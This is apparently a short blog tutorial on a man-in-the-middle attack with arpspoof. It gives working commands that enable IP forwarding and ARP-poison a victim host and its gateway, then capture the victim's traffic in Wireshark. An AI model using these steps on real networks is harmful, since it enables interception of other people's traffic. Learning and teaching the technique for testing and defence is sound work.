Apr 8, 2020 by Thibault Debatty | 771 views
In this post we show how to easily perform a L2 man-in-the-middle attack using arpspoof on a standard Ubuntu computer...
arpspoof you actually have to install the
sudo apt install dsniff
And you are done...
Before using arpspoof, you need to activate packet forwarding in your kernel:
sudo sysctl net.ipv4.ip_forward=1
The classical way to use arpspoof is the following:
sudo arpspoof -i <interface> -t <target> -r <gateway>
interfaceis your network interface that arpspoof has to use
targetis the IP address of the victim
gatewayis the IP address of the default gateway on the network
-rindicates that arpspoof should poison both the target and the default gateway, to capture traffic in both directions
For this example, we want to capture the traffic between a victim on our network (IP 192.168.0.13) and the default gateway (IP 192.168.0.1). Hence we will collect all traffic between the victim and the internet...
So now is the good moment to start wireshark and start collecting traffic. To see only traffic related to victim (and not our own traffic), we can use the following filter in wireshark:
ip.addr == 192.168.0.13
At first very few or no packets are captured (only broadcast packets).
Now, in a terminal, let's start arpspoof:
sudo arpspoof -i enp0s3 -t 192.168.0.13 -r 192.168.0.1
After a few seconds, packets start to appear in wireshark... We can now start analyzing the traffic between the victim and the internet!